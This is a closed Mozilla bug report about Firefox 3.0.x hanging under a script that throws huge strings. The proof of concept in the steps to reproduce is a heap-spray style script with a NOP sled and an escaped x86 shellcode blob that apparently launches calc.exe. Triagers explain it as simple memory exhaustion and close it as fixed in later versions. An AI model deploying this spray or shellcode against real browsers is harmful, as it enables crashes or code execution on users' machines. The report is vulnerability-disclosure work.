Closed Bug 490748 Opened 16 years ago Closed 13 years ago

Mozilla Firefox 3.0x "throw exception" Silent Memory Exhaustion and Remote Denial of Service

Categories

(Core :: JavaScript Engine, defect)

Product:
Core
Component:
JavaScript Engine
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
RESOLVED WORKSFORME

People

(Reporter: adi.zerok, Unassigned)

Details

(Keywords: hang, Whiteboard: [sg:dos])

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 The Mozilla Firefox browser is vulnerable to memory exhaustion based denial of service which can be triggered remotely.The vulnerability is a result of arbitrary shell code which is rendered in a script tag with an exception that is raised directly with throw statement. It makes the browser to consume memory thereby impacting the focussed window. The impact can be stringent based on different systems. Reproducible: Always Steps to Reproduce: The below mentioned proof of concept will trigger the bug <script language="JavaScript"> var nop_sled=unescape("%u9090"); var shellcode_sled=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065"); for(var i=0;i<64;i++){ nop_sled=nop_sled+nop_sled; document.write('<script>throw nop_sled+shellcode_sled;</scr'+'ipt>'); } </script> Actual Results: Browser hangs thereby impacting the system stability. Process killing is the only solution left Expected Results: This should not happen and memory consuming check should be placed to confront it.
Your script is trying to create a nop_sled string that's 2^64 long (1.8e+19 bytes). That's not going to work when you've only got 2-4Gb of memory or so. I'm sure there must already be a bug on dealing with scripts that try to use unreasonable amounts of memory.
Assignee: nobody → general
Group: core-security
Component: Security → JavaScript Engine
Keywords: hang
Product: Firefox → Core
QA Contact: firefox → general
Whiteboard: [sg:dos]
I understand but this type of behavior can impact in different layout.
PoC doesn't seem to do much in 10.0.1, which is the current version. Resolving this.
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Resolution: --- → WORKSFORME
You need to log in before you can comment on or make changes to this bug.